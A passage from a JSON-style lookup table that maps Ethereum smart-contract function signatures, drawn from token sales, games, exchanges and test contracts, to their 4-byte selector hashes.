"tokenB()": "0x5f64b55b", "GasPrice()": "0xf4d7b725", "doftManager()": "0x7e1b52f6", "isBatchSupported()": "0xaaeaa36c", "coinBurnIco()": "0x19617fe4", "MAX_BOUNTY_ALLOCATED_TOKENS()": "0xa024ea16", "SECOND_VOLUME_EXTRA_BONUS()": "0x17f992ab", "startRC()": "0x9c5de58b", "transferFrozen()": "0xade4637a", "totalNtsSold()": "0xef4e679b", "jackpotTokenLoseRewardRate()": "0xb3af4426", "minProfit()": "0x75c81ad0", "tokensFromEther()": "0xfa03446c", "airdropConjured()": "0xc64aace0", "NEBC()": "0x31d694a0", "backAtIndex(uint256,uint256)": "0x17e0dfb2", "getBonusPoolTotal()": "0x71d5b5dd", "buyTwo(uint256,uint256,uint256,uint256)": "0xa757fc42", "buy(uint256,uint256,uint256,uint256,uint256,uint256)": "0x45ce691a", "getListTeam(uint256)": "0x598abc9c", "getListTeamByPlayType(uint256)": "0xefe93036", "batchShareAmount(address[],uint256[],uint256,uint256,uint256)": "0x7f31cbfa", "shareAmount(address,uint256,uint256,uint256)": "0x9aa72b71", "setTeamStatus(bool,uint256)": "0x218a9640", "setTeamPrice(uint256[],uint256[],uint256)": "0x876590c3", "createGame(uint256[],uint256[],uint256,uint256)": "0xa11aab78", "QuintToken(address)": "0x629aef56", "BetherFund()": "0x9fef0ae1", "pooja()": "0xced1a60b", "closeTransfer()": "0x4e485c52", "unfrozenATAccount(address,address)": "0x6bf20a77", "frozenAccount(address,address)": "0xa5e767cd", "AimiToken(address,uint256)": "0x2bf8faba", "refund(address,address[])": "0xb40f0352", "batchTrade(address[11][],uint256[11][],uint8[2][],bytes32[2][],bytes32[2][])": "0xb67590aa", "trade(address[11],uint256[11],uint8[2],bytes32[2],bytes32[2])": "0xaa226780", "getOrderHash(address,uint256,address,uint256,address,uint256,uint256,address)": "0xadd37100", "adminWithdraw(address[3],uint256[3],uint8,bytes32,bytes32)": "0x7955a65f", "withdrawNoLimit(address,uint256)": "0x74cf6f49", "approveWithdraw(address,address)": "0xbe1ef5c1", "applyWithdraw(address,uint256)": "0xa537b716", "changeFeeRate(uint256)": "0xaffca932", "changeLockTime(uint256)": "0x96cf5227", "enableWithdraw(bool)": "0x92e33d14", "setFeeAccount(address,bool)": "0xa4de3c19", "VIcoin()": "0x681cb449", "FFFToken()": "0x83370c25", "setFeeParams(uint16,uint256,uint256)": "0x14c888da", "setFeeReceAccount(address)": "0x822f7eb4", "setLock(address,bool)": "0xb03c4b33", "ASTC()": "0xeeeb4f36", "emitIssuersUpdated(address,bool)": "0x8f0d16da", "emitEscrowUpdated(address)": "0x5b90ed39", "emitNominUpdated(address)": "0xcda0574e", "emitOracleUpdated(address)": "0x48fab2b0", "emitFeePeriodDurationUpdated(uint256)": "0xc0d4fa0c", "emitFeePeriodRollover(uint256)": "0x36ae22f0", "emitIssuanceRatioUpdated(uint256)": "0x03075ded", "emitPriceUpdated(uint256,uint256)": "0x8984034f", "USDtoHAV(uint256)": "0xa0edc671", "HAVtoUSD(uint256)": "0xdb8cfa5a", "transferableHavvens(address)": "0xdffcf9a7", "unlockedCollateral(address)": "0x0b566f33", "lockedCollateral(address)": "0x92bdf9ba", "issuanceDraft(address)": "0x25192fca", "remainingIssuableNomins(address)": "0xc939fd50", "maxIssuableNomins(address)": "0x80e37b5f", "rolloverFeePeriodIfElapsed()": "0x95701be3", "burnNomins(uint256)": "0x3253ccdf", "issueMaxNomins()": "0xda5341a8", "issueNomins(uint256)": "0x187cba25", "recomputeLastAverageBalance(address)": "0x65688182", "updateIssuanceData(address,uint256,uint256)": "0x5eabc684", "totalIssuanceLastModified()": "0x959e4748", "totalIssuanceLastAverageBalance()": "0xc2d15d21", "totalIssuanceCurrentBalanceSum()": "0xca77ba31", "issuanceLastModified(address)": "0xfe22fcd8", "issuanceLastAverageBalance(address)": "0x6fcb0153", "issuanceCurrentBalanceSum(address)": "0xc43821aa", "setIssuer(address,bool)": "0x495289be", "setIssuanceRatio(uint256)": "0x054be0b7", "setPriceStalePeriod(uint256)": "0x29f3533c", "setFeePeriodDuration(uint256)": "0x04c49f2c", "emitBurned(address,uint256)": "0xeb08dbfc", "emitIssued(address,uint256)": "0x66fe16e9", "emitAccountUnfrozen(address)": "0x6fd86d44", "emitAccountFrozen(address,uint256)": "0x18797c35", "emitHavvenUpdated(address)": "0x6fa4095e", "emitCourtUpdated(address)": "0xdb80a787", "freezeAndConfiscate(address)": "0x37986d2b", "transferFromSenderPaysFee(address,address,uint256)": "0xe6fbf441", "transferSenderPaysFee(address,uint256)": "0xd66c9cc2", "emitFeesDonated(address,uint256)": "0xc1d298ab", "emitFeesWithdrawn(address,uint256)": "0xbed50ef8", "emitFeeAuthorityUpdated(address)": "0x1ed6a6ab", "emitTransferFeeRateUpdated(uint256)": "0xd8dd2b79", "_transferFromSenderPaysFee_byProxy(address,address,address,uint256)": "0x8178ab99", "_transferSenderPaysFee_byProxy(address,address,uint256)": "0x4de4145f", "_internalTransfer(address,address,uint256,uint256)": "0x15d4f2df", "amountReceived(uint256)": "0x1a463a7d", "emitTokenStateUpdated(address)": "0x12b4ba71", "_internalTransfer(address,address,uint256)": "0x9a4373a6", "setSelfDestructBeneficiary(address)": "0x20714f88", "withdr(uint256)": "0xd975f3b7", "clean(address,address)": "0xafe14c19", "abort(address)": "0x90cbfa19", "close(address)": "0xc74073a1", "getSecret(address)": "0x284180fc", "createSwap(bytes20,address)": "0xa543bae7", "checkSign(address)": "0xc52141da", "setReputationAddress(address)": "0x29fd8201", "getMy()": "0x8b5462da", "change(address,int256)": "0xeb968ac7", "MomentumToken()": "0x9709709a", "tokenFrom()": "0x7c153534", "minimumAllowedWei()": "0x15093e03", "minimumInvestmentInWei()": "0xfe052bc6", "HOST_SHARE()": "0xe1b7abda", "financialOfficerAddress()": "0xabe088a7", "checkFundingStateFailed()": "0x82f87fdb", "totalFailedOldOwnerTransferAmounts()": "0xb4cec530", "ratePerWeiFirstPhase()": "0x2f73010a", "nextRoundStartsAt()": "0x386e69dc", "WALLET_T8EX_ADMIN()": "0x8bbec9e4", "donatorReward()": "0x334191f7", "PURCHASE_AMOUNT_UNIT()": "0xf974a1a2", "totalAssetUnits()": "0x0e7f756a", "advisoryEthWallet()": "0x7b0f94ed", "dataCentreAddr()": "0x2533bb9d", "receivedWeiCap()": "0xedfab4fc", "whiteListMge()": "0x9374ec98", "megoAddress()": "0xe1479d07", "PRICE_MULTIPLIER_PREICO1()": "0x379080da", "oneYear()": "0xf27c3bf6", "buyerHistory()": "0x5f1768c1", "tstop()": "0xcb8d0f46", "step0Rate()": "0xb025abf1", "STAKE_MULTIPLIER()": "0xff70e8d9", "foundersWallet3()": "0xe4b73ac9", "checkPayments()": "0x7f9cbfc1", "unitCost()": "0xd7003222", "HEIGHT()": "0x69ea80d5", "signingPrefix()": "0xe2cc7a51", "payoutPeriodStart()": "0xf04e8c6f", "ethReceivedMain()": "0x9263b559", "DateOfBirth()": "0x0785cb94", "amountNeedToBeLock()": "0xb247c525", "BLOCKS_BUCKET_SIZE()": "0xfe0a5ab0", "moveToSafetyWallet()": "0xb9b1c90c", "angelGoal()": "0x17fc3f55", "receivedEther()": "0xcd53e455", "testChickenCnt()": "0x5cacdf29", "rescueAddress()": "0x525550ea", "shareAddEtherValue()": "0xa33b7510", "divRate()": "0xb2e02430", "TeamAndAdvisors()": "0x17c3119b", "lastPriceUpdateTimestamp()": "0x23b1f8e4", "allowBuy()": "0xab7cb211", "upgradableState()": "0x9495f8c6", "UKG_FUND()": "0x538082af", "startICOStage6()": "0x5ab5956e", "totalAmountOfPurchasesInCny()": "0x84311353", "tradingDate()": "0x43f98a56", "lowestAskTime()": "0xfbc5db95", "minValue2()": "0x5afa5bb6", "endBlockNumber()": "0xb4999e85", "delimiter()": "0xe7f4767c", "rndInc_()": "0x045ec563", "AMBASSADOR_SEVEN()": "0x603ccf5e", "commandAddress()": "0xca733c32", "bonusMatchPayoutInPercent()": "0x6aab223d", "TEAM_VESTING_CLIFF()": "0x4c515fb5", "DENOMINATOR()": "0x918f8674", "minGasForDrawing()": "0x89e478f6", "_preMcFly()": "0x8b96e41c", "capRound1()": "0x6bb27584", "thirdPreSaleDate()": "0x1d62a312", "MAX_WITHDRAW_PCT_DAILY()": "0x6d5d7612", "precisionFactor()": "0x9d902fc0", "unfreeze_period_time()": "0x741b2239", "forceOffsetExecuteFeeRate()": "0xc40fec3a", "maximumTokensForSecond()": "0x5a9c84f3", "refundPaused()": "0xfa358c24", "VOLUME_60()": "0xf674cfe5", "unlockTeamTokensTime()": "0xba6c6490", "custodyCounter()": "0x92535862", "LastTokenId()": "0x158b8e54", "checkTotalPrizesWaiting()": "0x09151f2d", "contributor()": "0xba80d787", "reserveY1()": "0x92afac6d", "presalePiStart()": "0xb6738bfb", "greyToken()": "0x5217cdff", "buriedSupply()": "0x02565633", "destroy_time()": "0x05d57a59", "STARTING_PACIFIST()": "0x8cfdacb0", "shareholders()": "0x3723bc0e", "initialSupplyPublicPreICO()": "0x1deb112b", "presaleTokensPerDollar()": "0xe3d2c1bf", "fourthStageMinting()": "0x5ed4382f", "teamTokensAllocated()": "0xfac5235b", "verifyTargetWallet()": "0x0576cb6f", "lastBlock_a18()": "0xfc3b7379", "organizer6()": "0x6ec84711", "gvpe_per_Keos()": "0x04eab1e1", "releaseTokensAndEtherForEmergencyFund()": "0x01e1ecb4", "betLockTime()": "0x4a2929ee", "queueFront()": "0x60dde4c2", "tokenMaxCap()": "0xddad3ca1", "looksCoin()": "0xce0bb9c4", "minSlippageFactorInBps()": "0xf9795a95", "unitsToSell()": "0x59c2aad0", "maxTeamBonusBps()": "0xc2021d1b", "startPhaseMaximumcontribution()": "0xe4503da4", "out5Done()": "0x5bd9ea2e", "transferOwnership(address,bytes32)": "0x89e6b5fb", "ChildContract(uint8,address,bytes32)": "0x923fa0fe", "reclaimEther()": "0x9f727c27", "HasNoEther()": "0xb5093f7c", "unregister(uint256,bytes)": "0x62d7216c", "WeiHash(address)": "0x82b58599", "hashOf(uint256)": "0x7e551b75", "register(uint256,bytes)": "0x765718d7", "isRefunded(uint256)": "0x55866c8d", "totalRefunded(uint256)": "0x0fa7b7b3", "isPaidOut(uint256)": "0x569eaf61", "isSuccess(uint256)": "0x2451a899", "hasFailed(uint256)": "0xf41e3494", "isOwner(uint256,address)": "0x5a5d096c", "isContributor(uint256,address)": "0x9eda7d23", "totalContributors(uint256)": "0x88e951dd", "expiryOf(uint256)": "0xbaef73e9", "fundingGoalOf(uint256)": "0x964fad94", "amountRaisedBy(uint256)": "0x2308a41c", "configOf(uint256)": "0xedc2ee4e", "beneficiaryOf(uint256)": "0x124cfc8c", "contributorID(uint256,address)": "0x850595c1", "createdAt(uint256)": "0x50a1676e", "contributorAt(uint256,uint256)": "0x3db7e347", "totalCampaigns()": "0x02932f56", "totalUserCampaigns(address)": "0xdd8d1cef", "userCampaignID(address,uint256)": "0x2d9e84b4", "contribute(uint256,address)": "0x60b0b0f0", "newCampaign(string,address,uint256,uint256,address)": "0x1c9ad79d", "FaucetManager(address,address[])": "0x24265408", "testCorrectFunctionIsCalledOnTransfer()": "0x429d15ba", "testFallbackIsCalledOnTransfer()": "0xef556029", "beforeEach()": "0x6331e7d4", "b(bool)": "0x652da5ff", "a(bool)": "0xae51c484", "sellStorj(uint256)": "0x446f6c1f", "sellTile(uint256)": "0xcfaf8a33", "tilePrice()": "0x4cd273d1", "storjPrice()": "0x2191f4a9", "storjBalance()": "0x283654c3", "tileBalance()": "0x8741f15e", "TokenChanger(address,address)": "0x7722d01f", "test_token_creation()": "0x53c7186c", "testFail_basic_sanity()": "0x72c1591c", "startsWith(string,string)": "0xadf069ea", "squareOfSums(uint256,uint256)": "0x8eb547d4", "Scientific()": "0xacfe711a", "createSale(uint256,uint256,address,address,address)": "0x7808dc69", "validatePurchase(address)": "0xf55206a5", "checkSaleValid()": "0xe39898d1", "changeEndTime(uint256)": "0x3052b75e", "updateWhitelist(address,uint256)": "0x1a73293d", "TruSale(uint256,uint256,address,address)": "0x407001c6", "createBar()": "0xfcef56a4", "toBytes32(bool)": "0x5590e4d2", "toBool(bytes32)": "0x934e03a4", "sanityCheck(bytes32,bytes32)": "0x48868ac8", "calculateCurrentDistanceInRange(address)": "0x997c88ba", "calculateRangeLength()": "0xd1d2bd55", "TimeDecayingTokenBoundaryRange(uint256,uint256,uint256,uint256,address)": "0x55c208ad", "getURL()": "0x38bcdc1c", "setURL(string)": "0x77343408", "Emergence()": "0x08b140dc", "getLast()": "0x4d622831", "setCurrentBlock()": "0xdccf77ce", "currentBlock()": "0xe12ed13c", "when()": "0xe2b0caef", "post(address,bytes32,bytes32)": "0x8043154d", "pre(address,bytes32,bytes32)": "0xc1786ab2", "cancelOrder(address,uint256)": "0x6a206137", "takeOrder(address,uint256,uint256)": "0xa5bbe7bf", "makeOrder(address,address,address,uint256,uint256)": "0x64738c23", "getTimestamp(address,uint256)": "0x2749bd81", "getOrder(address,uint256)": "0xedb25841", "getOwner(address,uint256)": "0x2f634a90", "isActive(address,uint256)": "0xd266e83b", "getLastOrderId(address)": "0xb424bd83", "isApproveOnly()": "0xec866d28", "isOwner()": "0x8f32d59b", "supportsToken()": "0x4d5f327c", "_setPermission(address,address,bytes4,address,bool)": "0x01da31ad", "_createPermission(address,address,bytes4,address)": "0xedd7fcc4", "getAppCode(bytes32)": "0x186bbb05", "canPerform(address,address,bytes4)": "0xf5e7ce99", "upgradeKernel(address)": "0x6a9cd450", "setAppCode(bytes32,address)": "0x5e4a8a20", "revokePermission(address,address,bytes4)": "0x4ec735ae", "grantPermission(address,address,bytes4,address)": "0x46f84dc4", "createPermission(address,address,bytes4,address)": "0x2aa8be8d", "initialize(address)": "0xc4d66de8", "suggestUrl(bytes32,bytes32)": "0x584e86ad", "url(bytes32)": "0xc659d443", "UrlHint(int256)": "0x1a85f4fb", "isWhitelisted(address)": "0x3af32abf", "forwardFunds()": "0x9d735286", "updateWhitelist(address[],bool)": "0xaff177ca", "claimUnsold()": "0xdad72332", "claimRefund()": "0xb5545a3c", "getTokens(uint256)": "0xd3c9cc26", "buyTokens(address)": "0xec8ac4d8", "getFinalAnswerIfMatches(bytes32,bytes32,address,uint32,uint256)": "0x12a203c3", "getFinalAnswer(bytes32)": "0xa462fb7b", "_updateCurrentAnswer(bytes32,bytes32,uint32)": "0x2e6bbde5", "_addAnswerToHistory(bytes32,bytes32,address,uint256,bool)": "0xc405e11b", "submitAnswerReveal(bytes32,bytes32,uint256,uint256)": "0x4dc266b4", "submitAnswerCommitment(bytes32,bytes32,uint256,address)": "0xd7cff986", "submitAnswer(bytes32,bytes32,uint256)": "0x77f325df", "fundAnswerBounty(bytes32)": "0x59245ff3", "_askQuestion(bytes32,bytes32,address,uint32,uint32)": "0xb03031b7", "askQuestion(uint256,string,address,uint32,uint32,uint256)": "0x762c38fd", "createTemplateAndAskQuestion(string,string,address,uint32,uint32,uint256)": "0xa1130d04", "createTemplate(string)": "0x83bf4609", "RealityCheck()": "0x13869333", "FrannickToken()": "0x9fc9d6c0", "NAP()": "0x94f7624f", "IlumXXToken()": "0x28aa1a22", "setTier(uint256)": "0xe7a8a5cb", "ReporterTokenSale()": "0x67337d1a", "LBRSMultitransfer(address,address)": "0x55737391", "LibertyToken()": "0xf0f7bd31", "VICOXToken(uint256,address)": "0xfceca4a0", "checkBuy(uint256)": "0xec2c28b4", "checkSell(uint256)": "0x00b5277a", "maxBuy()": "0x70db69d6", "maxSell()": "0xb8eb3546", "exchangeBBDBalance()": "0x8df583bd", "transferToExchange(address,uint256)": "0xa80f54ca", "creationMinCap()": "0xf1ea6cbd", "creationRateOnTime()": "0xcaee1daf", "mintMany(address[],uint256[])": "0x4029a3ce", "DeNetToken()": "0xb30dbc67", "TokenROC()": "0xd15b506b", "transferFromSystem(address,address,uint256)": "0x51118f1d", "MegaCandy(address)": "0x370f388e", "LandAccessControl(address)": "0x51804743", "landPriceCandy()": "0x895abac9", "landPriceWei()": "0x5ef1bfdb", "ethLandSaleOpen()": "0xf678142a", "firstRankForFree()": "0x7bf9d052", "presaleOpen()": "0xbee6348a", "candyLandSaleAddress()": "0xdfadb43c", "candyLandAddress()": "0x2efd5632", "userRankAddress()": "0x07146786", "BitMineToken()": "0x23d7caee", "ownertransfer(address,uint256)": "0xfd1e582d", "greedyowner()": "0x3379d7a3", "buyAtoken()": "0xb3b85e7f", "AToken()": "0xd7cb55a2", "viewprice()": "0x5ae4c04a", "timeset()": "0x1b39f3d7", "verifyStage()": "0x0f2905f7", "ownerforce()": "0x4f1afb63", "ownerconfirm()": "0x87d7d24d", "setowner(address)": "0x592bd705", "Rocketship()": "0x952a84ed", "status(address,bytes32)": "0xd6d76ed5", "_deleteEntry(bytes32)": "0x245d5556", "_addEntry(bytes32)": "0xe6e13795", "deleteEntry(string)": "0x17674544", "addEntry(string)": "0x17ce42bd", "proveIt(address,string)": "0xa07b2461", "proveIt(address,bytes32)": "0xb419f73b", "BarcelonavsRoma()": "0x4294bea0", "DogToken()": "0xec854a04", "PGGameToken()": "0x87ea8893", "TriwerToken()": "0x354211c9", "getString(uint256)": "0xb7c763b5", "setstring(uint256,string)": "0x376a4ce0", "SaveData()": "0xdc998901", "BirthdayCandy()": "0xcc6f0ed0", "NCP()": "0x38dc92bc", "safeSubtrNCP(uint256,uint256)": "0x604bf292", "GCOIN()": "0x83638c12", "ZHIHUIGUO()": "0x22c21e6c", "ENTA()": "0x634df88e", "AssetToken(uint256,string,string,uint8,address)": "0x7568d562", "PERSONAToken()": "0xe69e9337", "allocatedTokens(address,uint256)": "0x796c0c78", "setHgtRates(uint256,uint256,uint256,uint256,uint256,uint256)": "0x66c2ae95", "coinAddress()": "0xfdc61dd1", "linkCoin(address)": "0xaecd27fa", "newCs(address)": "0x8502293b", "unblock(address)": "0x67b220a5", "block(address)": "0x06907e17", "HelloGoldSale(address,address,address,address)": "0xb9a30afb", "parentChange(address,uint256)": "0xe5a7b51f", "addAllocationPartTwo(uint256)": "0xb64e8ad8", "addAllocationPartOne(uint256,uint256)": "0xd6edb047", "partAllocationLength()": "0x85a735dd", "updatedBalance(address)": "0x735d3e81", "aotLength()": "0xcb1a32a4", "currentAllocationLength()": "0x3e7d1acc", "GoldBackedToken(address)": "0x75f6641f", "setFeeCalculator(address)": "0x8c66d04f", "calcFees(uint256,uint256,uint256)": "0xd0699c98", "wotDay(uint256)": "0xf5552b42", "rateForDays(uint256)": "0x2fb2a061", "updateRate(uint256,uint256)": "0x405abb41", "calcMax()": "0xf880f920", "GoldFees()": "0x3b4cb5e5", "currentDayOfWeek()": "0xed81f681", "currentWeek()": "0x06575c89", "initializeWeekData(uint256)": "0xa3515b98", "storeImageString(string)": "0x0658b574", "postProof(string)": "0xbc25e2fd", "commitToWeek(uint256,uint256)": "0x2e9efb8e", "_assert(bool)": "0xcdeda055", "SGDT()": "0x52393d45", "Elance()": "0x98686304", "UnderratedToken()": "0xd57c25f8", "hasPlayerWagered(address)": "0xeb605e9f", "WCME()": "0x70b80d77", "forgeItems(uint256,uint256,address)": "0xa1bc13ad", "_transferItem(address,address,uint256)": "0x69c6f18d", "putOn(uint256,uint256,address)": "0xce9a6ac8", "takeOffItem(uint256,uint8,address)": "0x8c945d38", "_takeOffItem(uint256,uint8)": "0x39e54c34", "_getItem(uint256)": "0x7b5bee1d", "_getChamp(uint256)": "0xd1efb5cd", "setTokenForSale(uint256,uint256,address,bool)": "0xa87af57b", "giveToken(address,uint256,address,bool)": "0x50be7503", "cancelTokenSale(uint256,address,bool)": "0x4da1e0b7", "_transferChamp(address,address,uint256)": "0xe1bf50c8", "attack(uint256,uint256,address)": "0xdaaf3d2e", "withdrawChamp(uint256,address)": "0xca760021", "changeChampsName(uint256,string,address)": "0x09a0cfe4", "setItemsEC(address,address)": "0x9843e648", "setChampEC(address,address)": "0xbfbcf293", "loadCoreAddress(address)": "0xffd71e13", "makeProposal(uint8,uint8)": "0xb82b2a07", "editEtherLimit(uint256)": "0x3d7f09a3", "VerityToken()": "0xf45f74f8", "_verifyOptionPoolDefray(address)": "0x0a64bdb1", "_verifyOptionPoolIncome(address,uint256)": "0xb4e81236", "optionPoolMembersUnlockTime()": "0xa44f40e3", "optionPoolMembersAmount()": "0x8265fb13", "verifyOptionPoolMembers(address)": "0x4147e15e", "optionPoolBalance()": "0x3dd7b14b", "optionPoolTotalMax()": "0xe098c76d", "optionPoolTotal()": "0xb1a329d7", "optionPool()": "0x2aab80dd", "_0xGoldToken()": "0x9f2ffaff", "changeSoundcoinsContract(address)": "0x44ea54fe", "getSoundcoinsAddress()": "0x7be33b36", "getSDCCSupply()": "0xf22aa38b", "getHoldingsSupply()": "0x38cf22e3", "getMinableSupply()": "0x32cee2eb", "getAvailableSupply()": "0xc167d1cd", "SoundcoinsToken(address)": "0xba4823e1", "transferChips(address,address,uint256)": "0x50b2ae66", "chipBalanceOf(address,address)": "0xd968dab1", "endStake(address,address,uint256)": "0x836e643f", "stakeSDC(address,address,uint256)": "0x6268a0cd", "createSDC(address,address,uint256,uint256)": "0x5793bfdc", "createSDCC(address,address,uint256)": "0x38bd44f3", "eliminateSDCC(address,address,uint256)": "0x72b50845", "hasSDCC(address,address,uint256)": "0xec7df86e", "hasSDC(address,address,uint256)": "0x76959b6a", "Ldt()": "0x75e9e3e2", "Chromium()": "0xe55219c6", "NOVA(uint256,string,uint8,string)": "0x0207eda6", "checkMinMaxInvestment(uint256)": "0x6f48455e", "adjustHardCap(uint256)": "0xe7a01352", "setEndICO(uint256)": "0x7e445d44", "setEndPreICO(uint256)": "0x27f8d7ba", "setStartPreICO(uint256)": "0xf62cec27", "BVA()": "0x44c9716a", "WFC(string,string,uint8,uint256)": "0xf5b4f3c1", "passGateway()": "0xb0aae3fa", "closeGateway()": "0x3800a119", "openGateway()": "0x4b2acaa0", "setWhitelistWallet(address)": "0x034f9774", "setTargetWallet(address)": "0x67374f3a", "removeFromWhitelistMultiple(address[])": "0x669529df", "addBeneficiary(address,uint256)": "0x96074e70", "allocateFunds()": "0xdba1a5f9", "CTS(uint256,string,string)": "0x344929e4", "WEBPOUND()": "0x365b29e8", "ETHcomeback820()": "0x3da368c0", "withdrawAllToExchange(address,uint256)": "0x0cf1d050", "withdrawToExchange(address,uint256)": "0x061b3245", "DepositETH(uint256)": "0xf21b64ad", "BAFCToken()": "0x4cfe50cb", "YOPT(uint256,string,uint8,string)": "0x729e3ef8", "getCurrentRoundRewards()": "0xd8c929a8", "disableStakingPeriod()": "0xa7638c4d", "prepareForEarlyFinalization()": "0xcfa01baf", "stakeGLXForContributors()": "0x7fd8d51d", "setVestTokenAllocationAddresses(address,address)": "0xb4038efe", "mintTokensForCrowdsaleParticipants(address[],uint256[])": "0x6b3cedd6", "GolixTokenDistribution(uint256,uint256,uint256,address,address,address)": "0xe35b8717", "addVestTokenAllocation(address,uint256)": "0x851c5bf6", "stakeGLX(address,address)": "0xee4c1ed3", "Thanatos()": "0xf51d61ff", "_doProposal()": "0x7a00698f", "_updateDistribution()": "0xec112460", "_moveBalance(address)": "0xaf489d5a", "voteOnProposal(bool)": "0xe3ccb809", "makeProposal(uint8,uint256)": "0xcb63ddb6", "getNobleBalance()": "0xf0163a82", "WagerGames()": "0x4b36bca9", "delToken()": "0x7aba4d23", "getLostTokens(address)": "0xda49cdb5", "updateSizeBonus(uint256)": "0x5c852231", "updatePromoBonus(uint256)": "0xc6faf736", "updatePromoEthCommission(uint256)": "0x7661129e", "updatePromoFishCommission(uint256)": "0x9ba3d8cf", "updateUnitsOneEthCanBuy(uint256)": "0xc63998ed", "sizeBonus()": "0x74d301d6", "promoBonus()": "0x76f6218a", "promoFishCommission()": "0xb36fef76", "unitsOneEthCanBuy()": "0x65f2bc2e", "getPromoCodeForFish(bytes16)": "0x3c520944", "getPromoCodeForEther(bytes16)": "0x00dbeb31", "promoCodeToContractAddress(bytes16)": "0x3c1c5931", "returnEthReceived()": "0x3b4b7808", "fishPromoHelpers(address)": "0x7a875ade", "areAllUppercase(bytes16)": "0x99b0dc4d", "ethPromoHelpers(address)": "0xb3e7c201", "promoEthCommission()": "0xc3ea0fca", "specialSend(uint256,address)": "0xc94c6787", "promoCode()": "0x27be1b35", "setInitialAllocationTimelock(address,uint32)": "0x3a96d16d", "setInitialAllocationUnlock(address)": "0x22935caa", "setInitialAllocationLock(address)": "0xd173e578", "setInitialAllocation(address[],bytes32[],uint256[])": "0x93a91f25", "setConfiguration(string,string,uint256)": "0xd834f1e8", "executeTransfer(address,uint256,bytes)": "0x6468328e", "executeTokenFallback(address,uint256,bytes)": "0x7b8de6d0", "buyStar(uint256,string,string)": "0xb2d1f9be", "giftStar(uint256,address)": "0x56abf07c", "sellStar(uint256,uint256)": "0x6446169b", "deleteStar(uint256)": "0xc36ad8a6", "updateStar(uint256,string,string)": "0xc3b3271d", "newStar(uint8,uint8,uint256)": "0x87e1029a", "createStar(uint8,uint16,string,string)": "0x26fe7cf2", "Stars()": "0x0c0a7a68", "getRandomPosition(uint8,uint8)": "0x5394e49e", "getRandomColorType()": "0x0b4cf825", "getRandom8(uint8,uint8)": "0x4f6a441c", "getRandom16(uint16,uint16)": "0x1018f294", "isValidMsgValue(uint256)": "0x6b9cadc1", "isValidMessageLength(string)": "0xf828500d", "isValidNameLength(string)": "0x4ca1c417", "isValidBox(uint8,uint8,uint16)": "0x64d5d024", "isValidZ(uint16)": "0xd80866da", "isValidGid(uint8)": "0xee9c7f43", "getZCount(uint8,uint8)": "0xdd0669d4", "getZIndex(uint16)": "0x76bc522c", "getBoxCountZIndex(uint8)": "0xc3ff05d1", "getBoxCount(uint16)": "0xf9b41139", "setBoxCount(uint16,uint16)": "0xc3657f96", "setGidMax(uint8)": "0x3f24ef7c", "setValidationData(uint16,uint16,uint8,uint8,uint8,uint8,uint16)": "0xb1c30210", "isStarOwner(uint256,address)": "0xc17de343", "starExists(uint256)": "0x9ed53f88", "getStarIdAtPosition(uint8,uint8,uint16)": "0x81f2d44c", "setStarDeleted(uint256)": "0xcd7dfa31", "setStarSellPrice(uint256,uint256)": "0xce7462e9", "setStarNewOwner(uint256,address)": "0xae4c5e45", "setStarNameMessage(uint256,string,string)": "0x071eeeb3", "placeStar(uint8,uint8,uint16,uint256)": "0x1bdd193a", "addStar(address,uint8,uint8,uint16,uint8,uint8,uint8,uint256)": "0x304d50b2", "withdrawBalance(address,uint256)": "0x0cf20cc9", "getCommission(uint256)": "0x3c8bccd9", "getCreatePrice(uint16,uint256)": "0x87bea35f", "setPriceData(uint256,uint16,uint256,uint8)": "0xaa0465b8", "updateContractOwner(address)": "0xeb9df7db", "rand8(uint256,uint8,uint8)": "0xa06de4d9", "rand16(uint256,uint16,uint16)": "0x37de1334", "rand(uint256,int256,int256)": "0x17089563", "divide(int256,int256,uint256)": "0x0ff89c2b", "getStringLength(string)": "0x65c19af0", "CryptoHarborExchange()": "0x2d07bf2f", "withdrawTokensFromPool(uint96)": "0xdca6f378", "dGetPool(uint8,uint8)": "0xa14c36ce", "dAlterPull(uint96)": "0x5be89fac", "dNextOffer()": "0xbd6de5a3", "dNextStage(uint32)": "0xc3e017c2", "dStartsNow()": "0x9a880629", "dTimeoutCurrentStage()": "0x9d042f87", "migratePool()": "0x0cded5f0", "switchStage()": "0x09214a07", "buildICOStageTwo()": "0x40de2784", "buildICOStageOne()": "0x834472a5", "buildPreICOStage()": "0x5af40b77", "UNITStagesManager(bool,address)": "0x61eb2e1a", "setCrowdsaleEndDate(uint32)": "0xdf9669e0", "setCrowdsaleStartDate(uint32)": "0x1376f2ce", "setPresaleEndDate(uint32)": "0x7b35819f", "setPresaleStartDate(uint32)": "0x7dcb422e", "transferTokensToOwner()": "0xa7c7fdeb", "bulkTransfer(uint32[],address[],uint256[])": "0x662723bb", "setUpCrowdsale()": "0xcafd3d52", "isTransactionSuccessful(uint32)": "0x7e779985", "EphesusToken()": "0x1536a614", "GraspSmartBlockchainLock()": "0x0685224c", "Darks(address,address)": "0x82d1bc89", "EVATOKEN()": "0x37fa33fe", "initialLockAddress(address)": "0x0425b5e9", "expectEventsExact(address)": "0x8af784dc", "LinkerExample()": "0xd1af8a5a", "assertEq0(bytes,bytes,bytes)": "0x7fa22001", "assertEq0(bytes,bytes)": "0xf578fd85", "assertFalse(bool,bytes)": "0x16cb9a01", "assertFalse(bool)": "0xa5982885", "assertTrue(bool,bytes)": "0x5eb3f639", "assertTrue(bool)": "0x0c9fd581", "fail()": "0xa9cc4718", "Test()": "0xa163a624", "_target(address)": "0x4bbb216c", "testBasicThing()": "0x3e5087cc", "testSomething()": "0x2f30283e", "purchase(uint256)": "0xefef39a1", "setTokenPrice(uint256)": "0x6a61e5fc", "PurchasableToken(uint256)": "0x2c7c4549", "mint(int256,uint256)": "0x1f3a3a53", "removeMinter(int256,address)": "0xad2fea7c", "addMinter(int256,address)": "0x27e056a5", "MintableToken(int256,uint256)": "0x0aa7881a", "Token(uint256)": "0x6241bfd1", "safeSub(uint256,uint256)": "0xa293d1e8", "safeAdd(uint256,uint256)": "0xe6cb9013", "update(address)": "0x1c1b8772", "openClaim(string)": "0x83f95f13", "terminate(string)": "0x0220a5b4", "payPremium()": "0x29c08ba2", "transferOwner(address)": "0x4fb2e45d", "numRecords()": "0xb5d1990d", "notorize(string)": "0x8ae475a9", "terminate(uint256,string)": "0x59d96db5", "authorizeExtension(uint256,bool,string)": "0xfdc4b338", "authorizeOpen(uint256,bool,string)": "0x4a3b0eec", "triggerPayment()": "0x00ce2057", "close()": "0x43d726d6", "extend(string)": "0x5c8a1053", "VersionModel()": "0x39246d75", "lookup(uint256)": "0x0a874df6", "set(uint256,uint256)": "0x1ab06ee5", 